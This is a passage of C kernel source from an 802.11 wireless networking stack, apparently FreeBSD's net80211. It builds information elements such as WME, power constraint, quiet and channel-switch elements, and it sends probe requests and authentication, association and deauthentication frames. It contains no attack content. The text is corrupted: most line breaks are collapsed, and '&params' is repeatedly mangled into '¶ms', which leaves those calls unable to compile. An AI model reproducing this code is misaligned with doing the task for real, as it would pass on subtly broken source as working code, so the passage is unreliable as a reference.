IEEE80211_ERP_LONG_PREAMBLE; *frm++ = erp; return frm; } /* * Add a CFParams element to a frame. 
 */
static uint8_t *
ieee80211_add_cfparms(uint8_t *frm, struct ieee80211com *ic)
{
#define	ADDSHORT(frm, v) do {	\
	LE_WRITE_2(frm, v);	\
	frm += 2;		\
} while (0)
	*frm++ = IEEE80211_ELEMID_CFPARMS;
	*frm++ = 6;
	*frm++ = 0;		/* CFP count */
	*frm++ = 2;		/* CFP period */
	ADDSHORT(frm, 0);	/* CFP MaxDuration (TU) */
	ADDSHORT(frm, 0);	/* CFP CurRemaining (TU) */
	return frm;
#undef ADDSHORT
}

static __inline uint8_t *
add_appie(uint8_t *frm, const struct ieee80211_appie *ie)
{
	memcpy(frm, ie->ie_data, ie->ie_len);
	return frm + ie->ie_len;
}

static __inline uint8_t *
add_ie(uint8_t *frm, const uint8_t *ie)
{
	memcpy(frm, ie, 2 + ie[1]);
	return frm + 2 + ie[1];
}

#define	WME_OUI_BYTES		0x00, 0x50, 0xf2
/*
 * Add a WME information element to a frame.
 */
static uint8_t *
ieee80211_add_wme_info(uint8_t *frm, struct ieee80211_wme_state *wme)
{
	static const struct ieee80211_wme_info info = {
		.wme_id		= IEEE80211_ELEMID_VENDOR,
		.wme_len	= sizeof(struct ieee80211_wme_info) - 2,
		.wme_oui	= { WME_OUI_BYTES },
		.wme_type	= WME_OUI_TYPE,
		.wme_subtype	= WME_INFO_OUI_SUBTYPE,
		.wme_version	= WME_VERSION,
		.wme_info	= 0,
	};
	memcpy(frm, &info, sizeof(info));
	return frm + sizeof(info);
}

/*
 * Add a WME parameters element to a frame.
 */
static uint8_t *
ieee80211_add_wme_param(uint8_t *frm, struct ieee80211_wme_state *wme)
{
#define	SM(_v, _f)	(((_v) << _f##_S) & _f)
#define	ADDSHORT(frm, v) do {	\
	LE_WRITE_2(frm, v);	\
	frm += 2;		\
} while (0)
	/* NB: this works 'cuz a param has an info at the front */
	static const struct ieee80211_wme_info param = {
		.wme_id		= IEEE80211_ELEMID_VENDOR,
		.wme_len	= sizeof(struct ieee80211_wme_param) - 2,
		.wme_oui	= { WME_OUI_BYTES },
		.wme_type	= WME_OUI_TYPE,
		.wme_subtype	= WME_PARAM_OUI_SUBTYPE,
		.wme_version	= WME_VERSION,
	};
	int i;

	memcpy(frm, &param, sizeof(param));
	frm += __offsetof(struct ieee80211_wme_info, wme_info);
	*frm++ = wme->wme_bssChanParams.cap_info;	/* AC info */
	*frm++ = 0;					/* reserved field */
	for (i = 0; i < WME_NUM_AC; i++) {
		const struct wmeParams *ac =
		    &wme->wme_bssChanParams.cap_wmeParams[i];
		*frm++ = SM(i, WME_PARAM_ACI)
		       | SM(ac->wmep_acm, WME_PARAM_ACM)
		       | SM(ac->wmep_aifsn, WME_PARAM_AIFSN)
		       ;
		*frm++ = SM(ac->wmep_logcwmax, WME_PARAM_LOGCWMAX)
		       | SM(ac->wmep_logcwmin, WME_PARAM_LOGCWMIN)
		       ;
		ADDSHORT(frm, ac->wmep_txopLimit);
	}
	return frm;
#undef SM
#undef ADDSHORT
}
#undef WME_OUI_BYTES

/*
 * Add an 11h Power Constraint element to a frame.
 */
static uint8_t *
ieee80211_add_powerconstraint(uint8_t *frm, struct ieee80211vap *vap)
{
	const struct ieee80211_channel *c = vap->iv_bss->ni_chan;
	/* XXX per-vap tx power limit? */
	int8_t limit = vap->iv_ic->ic_txpowlimit / 2;

	frm[0] = IEEE80211_ELEMID_PWRCNSTR;
	frm[1] = 1;
	frm[2] = c->ic_maxregpower > limit ? c->ic_maxregpower - limit : 0;
	return frm + 3;
}

/*
 * Add an 11h Power Capability element to a frame.
 */
static uint8_t *
ieee80211_add_powercapability(uint8_t *frm, const struct ieee80211_channel *c)
{
	frm[0] = IEEE80211_ELEMID_PWRCAP;
	frm[1] = 2;
	frm[2] = c->ic_minpower;
	frm[3] = c->ic_maxpower;
	return frm + 4;
}

/*
 * Add an 11h Supported Channels element to a frame.
 */
static uint8_t *
ieee80211_add_supportedchannels(uint8_t *frm, struct ieee80211com *ic)
{
	static const int ielen = 26;

	frm[0] = IEEE80211_ELEMID_SUPPCHAN;
	frm[1] = ielen;		/* XXX not correct */
	memcpy(frm+2, ic->ic_chan_avail, ielen);
	return frm + 2 + ielen;
}

/*
 * Add an 11h Quiet time element to a frame.
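 *
 * The element built below is laid out as (all lengths in bytes):
 *
 *	[1] element id (IEEE80211_ELEMID_QUIET)
 *	[1] length (6)
 *	[1] quiet count (TBTTs until the quiet interval starts)
 *	[1] quiet period (beacon intervals between quiet intervals)
 *	[2] quiet duration (TU, little-endian)
 *	[2] quiet offset (TU after TBTT, little-endian)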
*/ static uint8_t * ieee80211_add_quiet(uint8_t *frm, struct ieee80211vap *vap) { struct ieee80211_quiet_ie *quiet = (struct ieee80211_quiet_ie *) frm; quiet->quiet_ie = IEEE80211_ELEMID_QUIET; quiet->len = 6; if (vap->iv_quiet_count_value == 1) vap->iv_quiet_count_value = vap->iv_quiet_count; else if (vap->iv_quiet_count_value > 1) vap->iv_quiet_count_value--; if (vap->iv_quiet_count_value == 0) { /* value 0 is reserved as per 802.11h standerd */ vap->iv_quiet_count_value = 1; } quiet->tbttcount = vap->iv_quiet_count_value; quiet->period = vap->iv_quiet_period; quiet->duration = htole16(vap->iv_quiet_duration); quiet->offset = htole16(vap->iv_quiet_offset); return frm + sizeof(*quiet); } /* * Add an 11h Channel Switch Announcement element to a frame. * Note that we use the per-vap CSA count to adjust the global * counter so we can use this routine to form probe response * frames and get the current count. */ static uint8_t * ieee80211_add_csa(uint8_t *frm, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_csa_ie *csa = (struct ieee80211_csa_ie *) frm; csa->csa_ie = IEEE80211_ELEMID_CSA; csa->csa_len = 3; csa->csa_mode = 1; /* XXX force quiet on channel */ csa->csa_newchan = ieee80211_chan2ieee(ic, ic->ic_csa_newchan); csa->csa_count = ic->ic_csa_count - vap->iv_csa_count; return frm + sizeof(*csa); } /* * Add an 11h country information element to a frame. */ static uint8_t * ieee80211_add_countryie(uint8_t *frm, struct ieee80211com *ic) { if (ic->ic_countryie == NULL || ic->ic_countryie_chan != ic->ic_bsschan) { /* * Handle lazy construction of ie. This is done on * first use and after a channel change that requires * re-calculation. */ if (ic->ic_countryie != NULL) free(ic->ic_countryie, M_80211_NODE_IE); ic->ic_countryie = ieee80211_alloc_countryie(ic); if (ic->ic_countryie == NULL) return frm; ic->ic_countryie_chan = ic->ic_bsschan; } return add_appie(frm, ic->ic_countryie); } uint8_t * ieee80211_add_wpa(uint8_t *frm, const struct ieee80211vap *vap) { if (vap->iv_flags & IEEE80211_F_WPA1 && vap->iv_wpa_ie != NULL) return (add_ie(frm, vap->iv_wpa_ie)); else { /* XXX else complain? */ return (frm); } } uint8_t * ieee80211_add_rsn(uint8_t *frm, const struct ieee80211vap *vap) { if (vap->iv_flags & IEEE80211_F_WPA2 && vap->iv_rsn_ie != NULL) return (add_ie(frm, vap->iv_rsn_ie)); else { /* XXX else complain? */ return (frm); } } uint8_t * ieee80211_add_qos(uint8_t *frm, const struct ieee80211_node *ni) { if (ni->ni_flags & IEEE80211_NODE_QOS) { *frm++ = IEEE80211_ELEMID_QOS; *frm++ = 1; *frm++ = 0; } return (frm); } /* * Send a probe request frame with the specified ssid * and any optional information element data. */ int ieee80211_send_probereq(struct ieee80211_node *ni, const uint8_t sa[IEEE80211_ADDR_LEN], const uint8_t da[IEEE80211_ADDR_LEN], const uint8_t bssid[IEEE80211_ADDR_LEN], const uint8_t *ssid, size_t ssidlen) { struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; const struct ieee80211_txparam *tp; struct ieee80211_bpf_params params; struct ieee80211_frame *wh; const struct ieee80211_rateset *rs; struct mbuf *m; uint8_t *frm; int ret; if (vap->iv_state == IEEE80211_S_CAC) { IEEE80211_NOTE(vap, IEEE80211_MSG_OUTPUT, ni, "block %s frame in CAC state", "probe request"); vap->iv_stats.is_tx_badstate++; return EIO; /* XXX */ } /* * Hold a reference on the node so it doesn't go away until after * the xmit is complete all the way in the driver. On error we * will remove our reference. 
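 *
 * A sketch of the pattern used here and by the other senders below
 * (annotations only, not additional code):
 *
 *	ieee80211_ref_node(ni);        extra ref held across the TX path
 *	...build and hand off the mbuf...
 *	on failure: ieee80211_free_node(ni) balances the extra reference
 *	on success: it is released when the driver completes the transmit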
*/ IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); /* * prreq frame format * [tlv] ssid * [tlv] supported rates * [tlv] RSN (optional) * [tlv] extended supported rates * [tlv] WPA (optional) * [tlv] user-specified ie's */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), 2 + IEEE80211_NWID_LEN + 2 + IEEE80211_RATE_SIZE + sizeof(struct ieee80211_ie_wpa) + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + sizeof(struct ieee80211_ie_wpa) + (vap->iv_appie_probereq != NULL ? vap->iv_appie_probereq->ie_len : 0) ); if (m == NULL) { vap->iv_stats.is_tx_nobuf++; ieee80211_free_node(ni); return ENOMEM; } frm = ieee80211_add_ssid(frm, ssid, ssidlen); rs = ieee80211_get_suprates(ic, ic->ic_curchan); frm = ieee80211_add_rates(frm, rs); frm = ieee80211_add_rsn(frm, vap); frm = ieee80211_add_xrates(frm, rs); frm = ieee80211_add_wpa(frm, vap); if (vap->iv_appie_probereq != NULL) frm = add_appie(frm, vap->iv_appie_probereq); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); KASSERT(M_LEADINGSPACE(m) >= sizeof(struct ieee80211_frame), ("leading space %zd", M_LEADINGSPACE(m))); M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT); if (m == NULL) { /* NB: cannot happen */ ieee80211_free_node(ni); return ENOMEM; } IEEE80211_TX_LOCK(ic); wh = mtod(m, struct ieee80211_frame *); ieee80211_send_setup(ni, m, IEEE80211_FC0_TYPE_MGT | IEEE80211_FC0_SUBTYPE_PROBE_REQ, IEEE80211_NONQOS_TID, sa, da, bssid); /* XXX power management? */ m->m_flags |= M_ENCAP; /* mark encapsulated */ M_WME_SETAC(m, WME_AC_BE); IEEE80211_NODE_STAT(ni, tx_probereq); IEEE80211_NODE_STAT(ni, tx_mgmt); IEEE80211_DPRINTF(vap, IEEE80211_MSG_DEBUG | IEEE80211_MSG_DUMPPKTS, "send probe req on channel %u bssid %s ssid \"%.*s\"\n", ieee80211_chan2ieee(ic, ic->ic_curchan), ether_sprintf(bssid), ssidlen, ssid); memset(¶ms, 0, sizeof(params)); params.ibp_pri = M_WME_GETAC(m); tp = &vap->iv_txparms[ieee80211_chan2mode(ic->ic_curchan)]; params.ibp_rate0 = tp->mgmtrate; if (IEEE80211_IS_MULTICAST(da)) { params.ibp_flags |= IEEE80211_BPF_NOACK; params.ibp_try0 = 1; } else params.ibp_try0 = tp->maxretry; params.ibp_power = ni->ni_txpower; ret = ieee80211_raw_output(vap, ni, m, ¶ms); IEEE80211_TX_UNLOCK(ic); return (ret); } /* * Calculate capability information for mgt frames. */ uint16_t ieee80211_getcapinfo(struct ieee80211vap *vap, struct ieee80211_channel *chan) { struct ieee80211com *ic = vap->iv_ic; uint16_t capinfo; KASSERT(vap->iv_opmode != IEEE80211_M_STA, ("station mode")); if (vap->iv_opmode == IEEE80211_M_HOSTAP) capinfo = IEEE80211_CAPINFO_ESS; else if (vap->iv_opmode == IEEE80211_M_IBSS) capinfo = IEEE80211_CAPINFO_IBSS; else capinfo = 0; if (vap->iv_flags & IEEE80211_F_PRIVACY) capinfo |= IEEE80211_CAPINFO_PRIVACY; if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && IEEE80211_IS_CHAN_2GHZ(chan)) capinfo |= IEEE80211_CAPINFO_SHORT_PREAMBLE; if (ic->ic_flags & IEEE80211_F_SHSLOT) capinfo |= IEEE80211_CAPINFO_SHORT_SLOTTIME; if (IEEE80211_IS_CHAN_5GHZ(chan) && (vap->iv_flags & IEEE80211_F_DOTH)) capinfo |= IEEE80211_CAPINFO_SPECTRUM_MGMT; return capinfo; } /* * Send a management frame. The node is for the destination (or ic_bss * when in station mode). Nodes other than ic_bss have their reference * count bumped to reflect our use for an indeterminant time. 
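 *
 * The arg parameter is overloaded per frame type; for authentication
 * frames the status code rides in the upper 16 bits and the sequence
 * number in the lower 16 (see the decode at the top of the routine).
 * A hypothetical caller sending auth sequence 2 with a success status:
 *
 *	ieee80211_send_mgmt(ni, IEEE80211_FC0_SUBTYPE_AUTH,
 *	    (IEEE80211_STATUS_SUCCESS << 16) | IEEE80211_AUTH_OPEN_RESPONSE);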
*/ int ieee80211_send_mgmt(struct ieee80211_node *ni, int type, int arg) { #define HTFLAGS (IEEE80211_NODE_HT | IEEE80211_NODE_HTCOMPAT) #define senderr(_x, _v) do { vap->iv_stats._v++; ret = _x; goto bad; } while (0) struct ieee80211vap *vap = ni->ni_vap; struct ieee80211com *ic = ni->ni_ic; struct ieee80211_node *bss = vap->iv_bss; struct ieee80211_bpf_params params; struct mbuf *m; uint8_t *frm; uint16_t capinfo; int has_challenge, is_shared_key, ret, status; KASSERT(ni != NULL, ("null node")); /* * Hold a reference on the node so it doesn't go away until after * the xmit is complete all the way in the driver. On error we * will remove our reference. */ IEEE80211_DPRINTF(vap, IEEE80211_MSG_NODE, "ieee80211_ref_node (%s:%u) %p<%s> refcnt %d\n", __func__, __LINE__, ni, ether_sprintf(ni->ni_macaddr), ieee80211_node_refcnt(ni)+1); ieee80211_ref_node(ni); memset(¶ms, 0, sizeof(params)); switch (type) { case IEEE80211_FC0_SUBTYPE_AUTH: status = arg >> 16; arg &= 0xffff; has_challenge = ((arg == IEEE80211_AUTH_SHARED_CHALLENGE || arg == IEEE80211_AUTH_SHARED_RESPONSE) && ni->ni_challenge != NULL); /* * Deduce whether we're doing open authentication or * shared key authentication. We do the latter if * we're in the middle of a shared key authentication * handshake or if we're initiating an authentication * request and configured to use shared key. */ is_shared_key = has_challenge || arg >= IEEE80211_AUTH_SHARED_RESPONSE || (arg == IEEE80211_AUTH_SHARED_REQUEST && bss->ni_authmode == IEEE80211_AUTH_SHARED); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), 3 * sizeof(uint16_t) + (has_challenge && status == IEEE80211_STATUS_SUCCESS ? sizeof(uint16_t)+IEEE80211_CHALLENGE_LEN : 0) ); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); ((uint16_t *)frm)[0] = (is_shared_key) ? 
htole16(IEEE80211_AUTH_ALG_SHARED) : htole16(IEEE80211_AUTH_ALG_OPEN); ((uint16_t *)frm)[1] = htole16(arg); /* sequence number */ ((uint16_t *)frm)[2] = htole16(status);/* status */ if (has_challenge && status == IEEE80211_STATUS_SUCCESS) { ((uint16_t *)frm)[3] = htole16((IEEE80211_CHALLENGE_LEN << 8) | IEEE80211_ELEMID_CHALLENGE); memcpy(&((uint16_t *)frm)[4], ni->ni_challenge, IEEE80211_CHALLENGE_LEN); m->m_pkthdr.len = m->m_len = 4 * sizeof(uint16_t) + IEEE80211_CHALLENGE_LEN; if (arg == IEEE80211_AUTH_SHARED_RESPONSE) { IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "request encrypt frame (%s)", __func__); /* mark frame for encryption */ params.ibp_flags |= IEEE80211_BPF_CRYPTO; } } else m->m_pkthdr.len = m->m_len = 3 * sizeof(uint16_t); /* XXX not right for shared key */ if (status == IEEE80211_STATUS_SUCCESS) IEEE80211_NODE_STAT(ni, tx_auth); else IEEE80211_NODE_STAT(ni, tx_auth_fail); if (vap->iv_opmode == IEEE80211_M_STA) ieee80211_add_callback(m, ieee80211_tx_mgt_cb, (void *) vap->iv_state); break; case IEEE80211_FC0_SUBTYPE_DEAUTH: IEEE80211_NOTE(vap, IEEE80211_MSG_AUTH, ni, "send station deauthenticate (reason %d)", arg); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t)); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); *(uint16_t *)frm = htole16(arg); /* reason */ m->m_pkthdr.len = m->m_len = sizeof(uint16_t); IEEE80211_NODE_STAT(ni, tx_deauth); IEEE80211_NODE_STAT_SET(ni, tx_deauth_code, arg); ieee80211_node_unauthorize(ni); /* port closed */ break; case IEEE80211_FC0_SUBTYPE_ASSOC_REQ: case IEEE80211_FC0_SUBTYPE_REASSOC_REQ: /* * asreq frame format * [2] capability information * [2] listen interval * [6*] current AP address (reassoc only) * [tlv] ssid * [tlv] supported rates * [tlv] extended supported rates * [4] power capability (optional) * [28] supported channels (optional) * [tlv] HT capabilities * [tlv] WME (optional) * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Atheros capabilities (if negotiated) * [tlv] AppIE's (optional) */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + sizeof(uint16_t) + IEEE80211_ADDR_LEN + 2 + IEEE80211_NWID_LEN + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + 4 + 2 + 26 + sizeof(struct ieee80211_wme_info) + sizeof(struct ieee80211_ie_htcap) + 4 + sizeof(struct ieee80211_ie_htcap) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) #endif + (vap->iv_appie_wpa != NULL ? vap->iv_appie_wpa->ie_len : 0) + (vap->iv_appie_assocreq != NULL ? vap->iv_appie_assocreq->ie_len : 0) ); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); KASSERT(vap->iv_opmode == IEEE80211_M_STA, ("wrong mode %u", vap->iv_opmode)); capinfo = IEEE80211_CAPINFO_ESS; if (vap->iv_flags & IEEE80211_F_PRIVACY) capinfo |= IEEE80211_CAPINFO_PRIVACY; /* * NB: Some 11a AP's reject the request when * short premable is set. 
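 *
 * As an illustration, a protected 2GHz ERP association advertising
 * short preamble and short slot time would carry (assuming the
 * standard capability bit assignments):
 *
 *	capinfo = ESS (0x0001) | PRIVACY (0x0010) |
 *	    SHORT_PREAMBLE (0x0020) | SHORT_SLOTTIME (0x0400) = 0x0431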
*/ if ((ic->ic_flags & IEEE80211_F_SHPREAMBLE) && IEEE80211_IS_CHAN_2GHZ(ic->ic_curchan)) capinfo |= IEEE80211_CAPINFO_SHORT_PREAMBLE; if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan) && (ic->ic_caps & IEEE80211_C_SHSLOT)) capinfo |= IEEE80211_CAPINFO_SHORT_SLOTTIME; if ((ni->ni_capinfo & IEEE80211_CAPINFO_SPECTRUM_MGMT) && (vap->iv_flags & IEEE80211_F_DOTH)) capinfo |= IEEE80211_CAPINFO_SPECTRUM_MGMT; *(uint16_t *)frm = htole16(capinfo); frm += 2; KASSERT(bss->ni_intval != 0, ("beacon interval is zero!")); *(uint16_t *)frm = htole16(howmany(ic->ic_lintval, bss->ni_intval)); frm += 2; if (type == IEEE80211_FC0_SUBTYPE_REASSOC_REQ) { IEEE80211_ADDR_COPY(frm, bss->ni_bssid); frm += IEEE80211_ADDR_LEN; } frm = ieee80211_add_ssid(frm, ni->ni_essid, ni->ni_esslen); frm = ieee80211_add_rates(frm, &ni->ni_rates); frm = ieee80211_add_rsn(frm, vap); frm = ieee80211_add_xrates(frm, &ni->ni_rates); if (capinfo & IEEE80211_CAPINFO_SPECTRUM_MGMT) { frm = ieee80211_add_powercapability(frm, ic->ic_curchan); frm = ieee80211_add_supportedchannels(frm, ic); } if ((vap->iv_flags_ht & IEEE80211_FHT_HT) && ni->ni_ies.htcap_ie != NULL && ni->ni_ies.htcap_ie[0] == IEEE80211_ELEMID_HTCAP) frm = ieee80211_add_htcap(frm, ni); frm = ieee80211_add_wpa(frm, vap); if ((ic->ic_flags & IEEE80211_F_WME) && ni->ni_ies.wme_ie != NULL) frm = ieee80211_add_wme_info(frm, &ic->ic_wme); if ((vap->iv_flags_ht & IEEE80211_FHT_HT) && ni->ni_ies.htcap_ie != NULL && ni->ni_ies.htcap_ie[0] == IEEE80211_ELEMID_VENDOR) frm = ieee80211_add_htcap_vendor(frm, ni); #ifdef IEEE80211_SUPPORT_SUPERG if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS)) { frm = ieee80211_add_ath(frm, IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS), ((vap->iv_flags & IEEE80211_F_WPA) == 0 && ni->ni_authmode != IEEE80211_AUTH_8021X) ? vap->iv_def_txkey : IEEE80211_KEYIX_NONE); } #endif /* IEEE80211_SUPPORT_SUPERG */ if (vap->iv_appie_assocreq != NULL) frm = add_appie(frm, vap->iv_appie_assocreq); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); ieee80211_add_callback(m, ieee80211_tx_mgt_cb, (void *) vap->iv_state); break; case IEEE80211_FC0_SUBTYPE_ASSOC_RESP: case IEEE80211_FC0_SUBTYPE_REASSOC_RESP: /* * asresp frame format * [2] capability information * [2] status * [2] association ID * [tlv] supported rates * [tlv] extended supported rates * [tlv] HT capabilities (standard, if STA enabled) * [tlv] HT information (standard, if STA enabled) * [tlv] WME (if configured and STA enabled) * [tlv] HT capabilities (vendor OUI, if STA enabled) * [tlv] HT information (vendor OUI, if STA enabled) * [tlv] Atheros capabilities (if STA enabled) * [tlv] AppIE's (optional) */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t) + sizeof(uint16_t) + sizeof(uint16_t) + 2 + IEEE80211_RATE_SIZE + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + sizeof(struct ieee80211_ie_htcap) + 4 + sizeof(struct ieee80211_ie_htinfo) + 4 + sizeof(struct ieee80211_wme_param) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) #endif + (vap->iv_appie_assocresp != NULL ? 
vap->iv_appie_assocresp->ie_len : 0) ); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); capinfo = ieee80211_getcapinfo(vap, bss->ni_chan); *(uint16_t *)frm = htole16(capinfo); frm += 2; *(uint16_t *)frm = htole16(arg); /* status */ frm += 2; if (arg == IEEE80211_STATUS_SUCCESS) { *(uint16_t *)frm = htole16(ni->ni_associd); IEEE80211_NODE_STAT(ni, tx_assoc); } else IEEE80211_NODE_STAT(ni, tx_assoc_fail); frm += 2; frm = ieee80211_add_rates(frm, &ni->ni_rates); frm = ieee80211_add_xrates(frm, &ni->ni_rates); /* NB: respond according to what we received */ if ((ni->ni_flags & HTFLAGS) == IEEE80211_NODE_HT) { frm = ieee80211_add_htcap(frm, ni); frm = ieee80211_add_htinfo(frm, ni); } if ((vap->iv_flags & IEEE80211_F_WME) && ni->ni_ies.wme_ie != NULL) frm = ieee80211_add_wme_param(frm, &ic->ic_wme); if ((ni->ni_flags & HTFLAGS) == HTFLAGS) { frm = ieee80211_add_htcap_vendor(frm, ni); frm = ieee80211_add_htinfo_vendor(frm, ni); } #ifdef IEEE80211_SUPPORT_SUPERG if (IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS)) frm = ieee80211_add_ath(frm, IEEE80211_ATH_CAP(vap, ni, IEEE80211_F_ATHEROS), ((vap->iv_flags & IEEE80211_F_WPA) == 0 && ni->ni_authmode != IEEE80211_AUTH_8021X) ? vap->iv_def_txkey : IEEE80211_KEYIX_NONE); #endif /* IEEE80211_SUPPORT_SUPERG */ if (vap->iv_appie_assocresp != NULL) frm = add_appie(frm, vap->iv_appie_assocresp); m->m_pkthdr.len = m->m_len = frm - mtod(m, uint8_t *); break; case IEEE80211_FC0_SUBTYPE_DISASSOC: IEEE80211_NOTE(vap, IEEE80211_MSG_ASSOC, ni, "send station disassociate (reason %d)", arg); m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), sizeof(uint16_t)); if (m == NULL) senderr(ENOMEM, is_tx_nobuf); *(uint16_t *)frm = htole16(arg); /* reason */ m->m_pkthdr.len = m->m_len = sizeof(uint16_t); IEEE80211_NODE_STAT(ni, tx_disassoc); IEEE80211_NODE_STAT_SET(ni, tx_disassoc_code, arg); break; default: IEEE80211_NOTE(vap, IEEE80211_MSG_ANY, ni, "invalid mgmt frame type %u", type); senderr(EINVAL, is_tx_unknownmgt); /* NOTREACHED */ } /* NB: force non-ProbeResp frames to the highest queue */ params.ibp_pri = WME_AC_VO; params.ibp_rate0 = bss->ni_txparms->mgmtrate; /* NB: we know all frames are unicast */ params.ibp_try0 = bss->ni_txparms->maxretry; params.ibp_power = bss->ni_txpower; return ieee80211_mgmt_output(ni, m, type, ¶ms); bad: ieee80211_free_node(ni); return ret; #undef senderr #undef HTFLAGS } /* * Return an mbuf with a probe response frame in it. * Space is left to prepend and 802.11 header at the * front but it's left to the caller to fill in. 
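 *
 * A sketch of the expected caller sequence, error handling omitted
 * (this is what ieee80211_send_proberesp below does):
 *
 *	m = ieee80211_alloc_proberesp(bss, legacy);
 *	M_PREPEND(m, sizeof(struct ieee80211_frame), M_NOWAIT);
 *	ieee80211_send_setup(bss, m, IEEE80211_FC0_TYPE_MGT |
 *	    IEEE80211_FC0_SUBTYPE_PROBE_RESP, IEEE80211_NONQOS_TID,
 *	    vap->iv_myaddr, da, bss->ni_bssid);
 *	ieee80211_raw_output(vap, bss, m, NULL);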
*/ struct mbuf * ieee80211_alloc_proberesp(struct ieee80211_node *bss, int legacy) { struct ieee80211vap *vap = bss->ni_vap; struct ieee80211com *ic = bss->ni_ic; const struct ieee80211_rateset *rs; struct mbuf *m; uint16_t capinfo; uint8_t *frm; /* * probe response frame format * [8] time stamp * [2] beacon interval * [2] cabability information * [tlv] ssid * [tlv] supported rates * [tlv] parameter set (FH/DS) * [tlv] parameter set (IBSS) * [tlv] country (optional) * [3] power control (optional) * [5] channel switch announcement (CSA) (optional) * [tlv] extended rate phy (ERP) * [tlv] extended supported rates * [tlv] RSN (optional) * [tlv] HT capabilities * [tlv] HT information * [tlv] WPA (optional) * [tlv] WME (optional) * [tlv] Vendor OUI HT capabilities (optional) * [tlv] Vendor OUI HT information (optional) * [tlv] Atheros capabilities * [tlv] AppIE's (optional) * [tlv] Mesh ID (MBSS) * [tlv] Mesh Conf (MBSS) */ m = ieee80211_getmgtframe(&frm, ic->ic_headroom + sizeof(struct ieee80211_frame), 8 + sizeof(uint16_t) + sizeof(uint16_t) + 2 + IEEE80211_NWID_LEN + 2 + IEEE80211_RATE_SIZE + 7 /* max(7,3) */ + IEEE80211_COUNTRY_MAX_SIZE + 3 + sizeof(struct ieee80211_csa_ie) + sizeof(struct ieee80211_quiet_ie) + 3 + 2 + (IEEE80211_RATE_MAXSIZE - IEEE80211_RATE_SIZE) + sizeof(struct ieee80211_ie_wpa) + sizeof(struct ieee80211_ie_htcap) + sizeof(struct ieee80211_ie_htinfo) + sizeof(struct ieee80211_ie_wpa) + sizeof(struct ieee80211_wme_param) + 4 + sizeof(struct ieee80211_ie_htcap) + 4 + sizeof(struct ieee80211_ie_htinfo) #ifdef IEEE80211_SUPPORT_SUPERG + sizeof(struct ieee80211_ath_ie) #endif #ifdef IEEE80211_SUPPORT_MESH + 2 + IEEE80211_MESHID_LEN + sizeof(struct ieee80211_meshconf_ie) #endif + (vap->iv_appie_proberesp != NULL ? vap->iv_appie_proberesp->ie_len : 0) ); if (m == NULL) { vap->iv_stats.is_tx_nobuf++; return NULL; } memset(frm, 0, 8); /* timestamp should be filled later */ frm += 8; *(uint16_t *)frm = htole16(bss->ni_intval); frm += 2; capinfo = ieee80211_getcapinfo(vap, bss->ni_chan); *(uint16_t *)frm = htole16(capinfo); frm += 2; frm = ieee80211_add_ssid(frm, bss->ni_essid, bss->ni_esslen); rs = ieee80211_get_suprates(ic, bss->ni_chan); frm = ieee80211_add_rates(frm, rs); if (IEEE80211_IS_CHAN_FHSS(bss->ni_chan)) { *frm++ = IEEE80211_ELEMID_FHPARMS; *frm++ = 5; *frm++ = bss->ni_fhdwell & 0x00ff; *frm++ = (bss->ni_fhdwell >> 8) & 0x00ff; *frm++ = IEEE80211_FH_CHANSET( ieee80211_chan2ieee(ic, bss->ni_chan)); *frm++ = IEEE80211_FH_CHANPAT( ieee80211_chan2ieee(ic, bss->ni_chan)); *frm++ = bss->ni_fhindex; } else { *frm++ = IEEE80211_ELEMID_DSPARMS; *frm++ = 1; *frm++ = ieee80211_chan2ieee(ic, bss->ni_chan); } if (vap->iv_opmode == IEEE80211_M_IBSS) { *frm++ = IEEE80211_ELEMID_IBSSPARMS; *frm++ = 2; *frm++ = 0; *frm++ = 0; /* TODO: ATIM window */ } if ((vap->iv_flags & IEEE80211_F_DOTH) || (vap->iv_flags_ext & IEEE80211_FEXT_DOTD)) frm = ieee80211_add_countryie(frm, ic); if (vap->iv_flags & IEEE80211_F_DOTH) { if (IEEE80211_IS_CHAN_5GHZ(bss->ni_chan)) frm = ieee80211_add_powerconstraint(frm, vap); if (ic->ic_flags & IEEE80211_F_CSAPENDING) frm = ieee80211_add_csa(frm, vap); } if (vap->iv_flags & IEEE80211_F_DOTH) { if (IEEE80211_IS_CHAN_DFS(ic->ic_bsschan) && (vap->iv_flags_ext & IEEE80211_FEXT_DFS)) { if (vap->iv_quiet) frm = ieee80211_add_quiet(frm, vap); } } if (IEEE80211_IS_CHAN_ANYG(bss->ni_chan)) frm = ieee80211_add_erp(frm, ic); frm 